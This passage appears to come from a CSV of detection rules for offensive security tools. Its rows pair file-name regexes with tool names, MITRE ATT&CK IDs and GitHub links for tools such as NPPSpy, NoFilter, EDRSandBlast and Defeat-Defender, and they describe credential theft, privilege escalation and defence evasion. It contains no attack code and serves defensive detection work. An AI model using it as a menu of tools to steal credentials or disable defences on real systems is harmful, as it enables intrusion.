tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-pop3.py*",".{0,1000}\\nmap\-pop3\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-rdp.py*",".{0,1000}\\nmap\-rdp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-redis.py*",".{0,1000}\\nmap\-redis\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-rmi.py*",".{0,1000}\\nmap\-rmi\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-rsync.py*",".{0,1000}\\nmap\-rsync\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network 
reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-sip.py*",".{0,1000}\\nmap\-sip\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-smb.py*",".{0,1000}\\nmap\-smb\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-smtp.py*",".{0,1000}\\nmap\-smtp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-snmp.py*",".{0,1000}\\nmap\-snmp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-ssh.py*",".{0,1000}\\nmap\-ssh\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a 
multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-telnet.py*",".{0,1000}\\nmap\-telnet\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-tftp.py*",".{0,1000}\\nmap\-tftp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nmap-vnc.py*",".{0,1000}\\nmap\-vnc\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\nMethodNamespace=StandIn*",".{0,1000}\\nMethodNamespace\=StandIn.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" 
"*\NoAmsi.ps1*",".{0,1000}\\NoAmsi\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\NoArgs.cpp*",".{0,1000}\\NoArgs\.cpp.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*\NoArgs.exe*",".{0,1000}\\NoArgs\.exe.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. 
This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*\NoArgs.exe.config*",".{0,1000}\\NoArgs\.exe\.config.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*\NoArgs.exe.log*",".{0,1000}\\NoArgs\.exe\.log.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*\NoArgs_Encrypted.exe*",".{0,1000}\\NoArgs_Encrypted\.exe.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. 
This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*\No-Consolation\source\*",".{0,1000}\\No\-Consolation\\source\\.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/fortra/No-Consolation","1","0","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*\Nofault.exe*",".{0,1000}\\Nofault\.exe.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*\NoFilter.cpp*",".{0,1000}\\NoFilter\.cpp.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*\NoFilter.exe*",".{0,1000}\\NoFilter\.exe.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*\NoFilter.sln*",".{0,1000}\\NoFilter\.sln.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*\NoFilter.vcxproj*",".{0,1000}\\NoFilter\.vcxproj.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*\nopac.exe*",".{0,1000}\\nopac\.exe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" "*\nopac.py*",".{0,1000}\\nopac\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\NoPowerShell*",".{0,1000}\\NoPowerShell.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\NoPowerShell.*",".{0,1000}\\NoPowerShell\..{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - 
CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\No-PowerShell.cs*",".{0,1000}\\No\-PowerShell\.cs.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\No-PowerShell.exe*",".{0,1000}\\No\-PowerShell\.exe.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\norton\getCredsnorton.h*",".{0,1000}\\norton\\getCredsnorton\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\norton\getCredsnorton2.h*",".{0,1000}\\norton\\getCredsnorton2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\notavirus.exe*",".{0,1000}\\notavirus\.exe.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. 
appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*\NovaLdr.exe",".{0,1000}\\NovaLdr\.exe","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*\NoveLdr.exe",".{0,1000}\\NoveLdr\.exe","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*\NPPSpy.c*",".{0,1000}\\NPPSpy\.c.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). 
The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\NPPSPY.dll*",".{0,1000}\\NPPSPY\.dll.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\NPPSpy.exe*",".{0,1000}\\NPPSpy\.exe.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\NPPSpy.txt*",".{0,1000}\\NPPSpy\.txt.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). 
The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\nReversed shellcode:\n*",".{0,1000}\\nReversed\sshellcode\:\\n.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*\NSudo.bat*",".{0,1000}\\NSudo\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*\NSudo.exe*",".{0,1000}\\NSudo\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*\NSudo.exe*",".{0,1000}\\NSudo\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\NSudoC.exe*",".{0,1000}\\NSudoC\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*\NSudoG.exe*",".{0,1000}\\NSudoG\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*\ntdll_unhooking.exe*",".{0,1000}\\ntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\ntdll_unhooking.exe*",".{0,1000}\\ntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" 
"*\ntdlll-unhooking-collection*",".{0,1000}\\ntdlll\-unhooking\-collection.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*\ntdlol.txt*",".{0,1000}\\ntdlol\.txt.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*\ntdsutil.py*",".{0,1000}\\ntdsutil\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\NTHASH-FPC\*",".{0,1000}\\NTHASH\-FPC\\.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*\ntlm.py*",".{0,1000}\\ntlm\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*\ntlmdecoder.py*",".{0,1000}\\ntlmdecoder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*\ntlmdecoder.py*",".{0,1000}\\ntlmdecoder\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*\NTLMRelay2Self*",".{0,1000}\\NTLMRelay2Self.{0,1000}","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","0","N/A","10","4","377","44","2024-01-27T08:52:03Z","2022-04-30T10:05:02Z" "*\NtlmRelayToEWS\*",".{0,1000}\\NtlmRelayToEWS\\.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*\NtlmThief\*",".{0,1000}\\NtlmThief\\.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","0","N/A","10","3","205","30","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z" "*\ntlmutil.py*",".{0,1000}\\ntlmutil\.py.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","8","1","33","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*\ntlmv1.py*",".{0,1000}\\ntlmv1\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 
